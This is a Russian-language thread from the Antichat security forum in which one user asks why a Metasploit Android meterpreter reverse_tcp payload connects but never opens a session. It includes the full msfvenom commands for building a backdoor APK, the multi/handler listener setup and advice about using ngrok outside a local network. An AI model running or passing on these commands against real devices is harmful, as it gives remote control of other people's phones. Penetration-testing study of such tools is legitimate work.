HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.10.2019, 15:34
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

всем приветики!!! такие вот дела: создаю payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f raw -o /tmp/android.apk
потом:
msf5> use exploit/multi/handler
msf5> exploit(multi/handler) set PAYLOAD android/meterpreter/reverse_tcp
msf5> exploit(multi/handler) set LHOST 192.168.0.105
msf5> exploit(multi/handler) set LPORT 4444
msf5> exploit(multi/handler) exploit
запустился handler и слушает пакеты... в это время скидываю android.apk, запускаю.
такая картина:[*] Started reverse TCP handler on 192.168.0.105:4444[*] Sending stage (73550 bytes) to 192.168.0.104

прилетает сессия, handler учуял какие то движения на порту 4444, и все. метерпретер не запускается.
заметьте, это в локальной сети! если пропускать через ngrok сессия (не в локалке) токартина почти такая же. handler пишет что прилетела сессия 1, и так же метерпретер тупа не запускается....
я вот не пойму, это у меня что-то с метерпретером/метасплоитом или же проблема в другом?
PS примерно месяц назад все работало. может это обновления андроида? (обновил дроид неделю назад). не верится что столько лет жили с такой уязвимость, а тут неделю назад решили устранить это..
я бы поробовал на более старой версии андроида но нет его у меня, зато есть вы и античат
 
Ответить с цитированием

  #2  
Старый 20.10.2019, 15:55
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105

Ну и да дырку могли пофиксать, они не зря свой хлеб кушают
 
Ответить с цитированием

  #3  
Старый 20.10.2019, 16:03
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

Код:

Цитата:

mrOkey сказал(а):

веномский Пайлод

а в чем разница? метерпретер та один? может я что-то не знаю.... просвети))
вот совсем не хочется думать что там такие балбесы сидят... годами не исправляли, а тут решили исправить...

Цитата:

mrOkey сказал(а):

Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105

Ну и да дырку могли пофиксать, они не зря свой хлеб кушают

msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.0.105
LHOST => 192.168.0.105
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk[*] Writing 8992 bytes to /tmp/android.apk...
msf payload(reverse_tcp) >

ты про это?
 
Ответить с цитированием

  #4  
Старый 20.10.2019, 16:08
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Цитата:

s unity сказал(а):

msfvenom -p android/meterpreter/reverse_tcp LHOST=1092.168.0.105 LPORT=4444 -f raw -o /tmp/android.apk

про это
 
Ответить с цитированием

  #5  
Старый 20.10.2019, 16:16
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

Цитата:

mrOkey сказал(а):

про это

я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня
 
Ответить с цитированием

  #6  
Старый 20.10.2019, 16:18
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Цитата:

s unity сказал(а):

я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня

Да блин, ты внимательно посмотри на параметр LHOST.
Я тебе говорю, что я не знаю где ты опечатался - тут или у себя в консоле. Потому что в сообщении ты написал 1092.168 и далее
 
Ответить с цитированием

  #7  
Старый 20.10.2019, 16:22
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

Цитата:

mrOkey сказал(а):

параметр LHOST 1092.168 и далее

ааа блин здесь опечатался. щас поправлю))) я уже о другом подумал, начал гуглить. уже зарегался на ноунейм форумах, поднял кучу статей... а тут всего лишь опечатка
 
Ответить с цитированием

  #8  
Старый 20.10.2019, 16:29
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

окей, тогда по порядку. Порт 4444 в фаерволе открыл?

ещё чекни этот параметр для листнера

Код:


Код:
msf exploit(handler) > set EXITONSESSION false
 
Ответить с цитированием

  #9  
Старый 20.10.2019, 16:36
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

Цитата:

mrOkey сказал(а):

окей, тогда по порядку. Порт 4444 в фаерволе открыл?

сессия ведь прилетает...
сейчас чекнул namp свой ип 192.168.0.105
4444/tcp open krb524
вызывает подозрения процесс krb524 на этом порту
 
Ответить с цитированием

  #10  
Старый 20.10.2019, 16:40
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Цитата:

s unity сказал(а):

сессия ведь прилетает...
сейчас чекнул namp свой ип 192.168.0.105
4444/tcp open krb524
вызывает подозрения процесс krb524 на этом порту

nmap выносит предположение о сервисе. Не факт что у тебя именно он висит.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.